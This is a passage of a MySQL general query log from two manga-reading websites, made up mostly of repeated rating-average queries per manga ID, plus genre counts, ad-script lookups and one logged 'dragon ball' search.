mangauser@localhost on u317079482_mangacherri_2 using Socket 330644055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330644055 Quit 330644056 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330644056 Quit 330644057 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330644057 Quit 330644058 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644058 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330644058 Quit 330644059 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330644059 Quit 330644060 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644060 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330644060 Quit 330644061 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330644061 Quit 330644062 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644062 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330644062 Quit 330644063 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330644063 Quit 330644064 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644064 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330644064 Quit 330644065 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330644065 Quit 330644066 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644066 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330644066 Quit 330644067 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330644067 Quit 330644068 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330644068 Quit 330644069 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330644069 Quit 330644070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330644070 Quit 330644071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330644071 Quit 330643732 Quit 330644072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644072 Quit 330644073 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644073 Quit 330644074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644074 Quit 330644075 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644075 Quit 330644076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644076 Quit 330644077 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644077 Quit 330644078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644078 Quit 330644079 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644079 Quit 260225 19:28:28 330644080 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644081 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644080 Quit 330644081 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('dragon ball', '198.237.34.3', '2026-02-26 03:28:28') 330644081 Quit 330644082 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644082 Query select k.* from (select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.title like '%dragon ball%') as k where latest_chapter_id > 0 330644082 Quit 330644083 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644083 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.active = 1 AND REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'dragon ball' 330644083 Quit 330644084 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644084 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id AND m.active = 1) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330644084 Quit 330644085 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644086 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644085 Quit 330644086 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644086 Quit 330644087 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330644087 Quit 330644088 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330644088 Quit 330644089 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '136' order by created desc 330644089 Quit 330644090 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330644090 Quit 330644091 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330644091 Quit 330644092 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330644092 Quit 330644093 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '141' order by created desc 330644093 Quit 330644094 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330644094 Quit 330644095 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330644095 Quit 330644096 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330644096 Quit 330644097 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330644097 Quit 330644098 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '96' order by created desc 330644098 Quit 330644099 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330644099 Quit 330644100 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '157' order by created desc 330644100 Quit 330644101 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330644101 Quit 330644102 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644102 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330644102 Quit 330644103 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330644103 Quit 330644104 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644104 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '137' order by created desc 330644104 Quit 330644105 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330644105 Quit 330644106 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644106 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330644106 Quit 330644107 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330644107 Quit 330644108 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644108 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '150' order by created desc 330644108 Quit 330644109 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330644109 Quit 330644110 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330644110 Quit 330644111 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330644111 Quit 330644112 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '149' order by created desc 330644112 Quit 330644113 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '135' order by created desc 330644113 Quit 330644114 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330644114 Quit 330644115 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330644115 Quit 330644116 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '163' order by created desc 330644116 Quit 330644117 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330644117 Quit 330644118 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330644118 Quit 330644119 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330644119 Quit 330644120 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644120 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330644120 Quit 330644121 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330644121 Quit 330644122 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330644122 Quit 330644123 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330644123 Quit 330644124 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644124 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '158' order by created desc 330644124 Quit 330644125 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '152' order by created desc 330644125 Quit 330644126 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644126 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '166' order by created desc 330644126 Quit 330644127 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330644127 Quit 330644128 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644128 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330644128 Quit 330644129 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '61' order by created desc 330644129 Quit 330644130 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644130 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '132' order by created desc 330644130 Quit 330644131 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '160' order by created desc 330644131 Quit 330644132 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644132 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330644132 Quit 330644133 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330644133 Quit 330644134 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644134 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '142' order by created desc 330644134 Quit 330644135 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '140' order by created desc 330644135 Quit 330644136 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644136 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330644136 Quit 330644137 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330644137 Quit 330644138 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644138 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '169' order by created desc 330644138 Quit 330644139 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '55' order by created desc 330644139 Quit 330644140 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644140 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '133' order by created desc 330644140 Quit 330644141 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330644141 Quit 330644142 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644142 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '95' order by created desc 330644142 Quit 330644143 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330644143 Quit 330644144 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644144 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330644144 Quit 330644145 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330644145 Quit 330644146 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644146 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330644146 Quit 330644147 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '151' order by created desc 330644147 Quit 330644148 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330644148 Quit 330644149 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '146' order by created desc 330644149 Quit 330644150 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '170' order by created desc 330644150 Quit 330644151 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '138' order by created desc 330644151 Quit 330644152 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330644152 Quit 330644153 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '159' order by created desc 330644153 Quit 330644154 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330644154 Quit 330644155 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330644155 Quit 330644156 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330644156 Quit 330644157 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330644157 Quit 330644158 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330644158 Quit 330644159 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644159 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330644159 Quit 330644160 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644160 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330644160 Quit 330644161 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644161 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330644161 Quit 330644162 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644162 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '155' order by created desc 330644162 Quit 330644163 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644163 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330644163 Quit 330644164 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644164 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330644164 Quit 330644165 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644165 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330644165 Quit 330644166 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644166 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '167' order by created desc 330644166 Quit 330644167 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644167 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '145' order by created desc 330644167 Quit 330644168 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644168 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '69' order by created desc 330644168 Quit 330644169 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644169 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '144' order by created desc 330644169 Quit 330644170 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '165' order by created desc 330644170 Quit 330644171 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644171 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '148' order by created desc 330644171 Quit 330644172 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '154' order by created desc 330644172 Quit 330644173 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644173 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330644173 Quit 330644174 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644174 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330644174 Quit 330644175 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644175 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330644175 Quit 330644176 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330644176 Quit 330644177 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644177 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330644177 Quit 330644178 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644178 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330644178 Quit 330644179 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644179 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '56' order by created desc 330644179 Quit 330644180 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330644180 Quit 330644181 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644181 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330644181 Quit 330644182 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330644182 Quit 330644183 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644183 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330644183 Quit 330644184 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330644184 Quit 330644185 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644185 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330644185 Quit 330644186 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '164' order by created desc 330644186 Quit 330644187 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644187 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330644187 Quit 330644188 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330644188 Quit 330644189 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644189 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330644189 Quit 330644190 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330644190 Quit 330644191 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644191 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '79' order by created desc 330644191 Quit 330644192 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330644192 Quit 330644193 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644193 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330644193 Quit 330644194 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330644194 Quit 330644195 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644195 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '134' order by created desc 330644195 Quit 330644196 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330644196 Quit 330644197 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644197 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330644197 Quit 330644198 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644198 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '162' order by created desc 330644198 Quit 330644199 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644199 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330644199 Quit 330644200 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644200 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330644200 Quit 330644201 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330644201 Quit 330644202 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644202 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330644202 Quit 330644203 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644203 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '139' order by created desc 330644203 Quit 330644204 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330644204 Quit 330644205 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '161' order by created desc 330644205 Quit 330644206 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330644206 Quit 330644207 Connect 